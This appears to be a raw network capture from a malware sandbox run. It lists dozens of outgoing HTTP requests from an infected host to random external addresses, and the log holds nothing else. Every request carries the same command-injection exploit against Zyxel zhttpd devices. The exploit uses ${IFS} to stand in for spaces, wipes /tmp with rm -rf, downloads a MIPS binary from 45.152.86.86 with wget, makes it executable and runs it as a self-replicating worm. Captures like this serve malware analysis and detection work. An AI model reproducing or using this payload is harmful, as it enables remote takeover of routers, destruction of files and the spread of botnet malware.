                                        Mar 31, 2024 09:22:04.435861111 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6751192.168.2.234898249.125.180.131443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:04.435904980 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6752192.168.2.236035261.185.44.73443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:04.435935974 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6753192.168.2.2354640147.203.224.63443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:04.435986996 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6754192.168.2.234550881.42.110.10443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:04.436029911 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6755192.168.2.235413034.230.127.155443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:04.436060905 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6756192.168.2.2339768140.187.147.130443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:04.436091900 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6757192.168.2.2343050198.106.103.250443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:04.436141968 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6758192.168.2.2354040117.214.7.220443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:04.436207056 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6759192.168.2.2340666119.28.112.189443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:04.436239958 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6760192.168.2.2349328198.215.117.139443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:04.436306000 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6761192.168.2.2348114150.248.182.139443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:04.436341047 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6762192.168.2.2356924118.186.252.204443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:04.436408997 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6763192.168.2.234045639.41.94.171443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:04.436444044 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6764192.168.2.233675238.194.193.153443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:04.436485052 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6765192.168.2.233626631.3.114.1443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:04.436573029 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6766192.168.2.2339806123.68.191.68443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:04.436573029 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6767192.168.2.2340284153.166.18.134443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:04.436642885 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6768192.168.2.2359092116.43.66.223443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:04.436677933 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6769192.168.2.2359738138.161.41.113443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:04.436709881 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6770192.168.2.233423847.13.151.223443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:04.436773062 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6771192.168.2.234126835.162.146.78443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:04.436834097 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6772192.168.2.2338922194.218.10.3443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:04.436866045 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6773192.168.2.2355652206.102.54.35443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:04.436918020 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6774192.168.2.233975431.13.82.25443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:04.436973095 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6775192.168.2.2358388174.22.236.40443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:04.437020063 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6776192.168.2.234142480.229.177.15443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:04.437067032 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6777192.168.2.2338140195.106.112.182443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:04.437114954 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6778192.168.2.233330441.218.42.25443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:04.437165976 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6779192.168.2.234747272.33.183.196443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:04.437197924 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6780192.168.2.2341582208.250.66.226443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:04.437251091 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6781192.168.2.2360490169.48.137.59443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:04.437289953 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6782192.168.2.2350096132.117.221.223443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:04.437339067 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6783192.168.2.2342214185.41.230.174443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:04.437406063 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6784192.168.2.233543069.6.71.146443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:04.437441111 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6785192.168.2.235504044.5.179.242443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:04.437498093 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6786192.168.2.234363244.105.213.112443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:04.437530994 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6787192.168.2.2350276153.48.220.84443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:04.437571049 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6788192.168.2.2354516149.35.159.178443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:04.437603951 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6789192.168.2.233731469.208.67.172443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:04.437659979 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6790192.168.2.2352512166.229.102.2443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:04.437731028 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6791192.168.2.2338948186.28.73.218443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:04.437741995 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6792192.168.2.2341450120.166.126.250443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:04.437803984 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6793192.168.2.2334552110.200.160.85443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:04.437846899 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6794192.168.2.2349500170.85.203.115443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:04.437887907 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6795192.168.2.2334928182.202.64.170443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:04.437947989 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6796192.168.2.2359032100.254.67.106443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:04.437999010 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6797192.168.2.234611092.68.146.36443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:04.438045979 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6798192.168.2.235488885.36.248.118443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:04.438086987 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6799192.168.2.234930666.216.198.16443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:04.438121080 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6800192.168.2.2343006120.57.103.79443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:04.438158035 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6801192.168.2.2342818121.149.24.20443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:04.438222885 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6802192.168.2.2356086130.239.49.128443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:04.438263893 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6803192.168.2.234911480.100.129.36443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:04.438313007 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6804192.168.2.235764076.42.230.201443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:04.438375950 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6805192.168.2.2344824173.74.67.208443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:04.438426018 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6806192.168.2.235657814.132.206.31443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:04.438473940 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6807192.168.2.234677446.226.122.177443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:04.438518047 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6808192.168.2.2353746121.110.143.157443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:04.438565016 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6809192.168.2.234048876.232.93.253443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:04.438601971 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6810192.168.2.2353858188.59.155.135443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:04.438657045 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6811192.168.2.2341600222.89.109.83443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:04.438699007 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6812192.168.2.233482477.222.243.36443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:04.438749075 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6813192.168.2.2344478152.251.127.90443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:04.438802004 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6814192.168.2.2359448174.37.73.115443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:04.438839912 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6815192.168.2.234837054.222.234.87443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:04.438877106 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6816192.168.2.2359314191.161.181.189443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:04.438929081 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6817192.168.2.2343716221.166.100.43443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:04.438987017 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6818192.168.2.2354676197.22.190.99443
                                        TimestampBytes transferredDirectionData
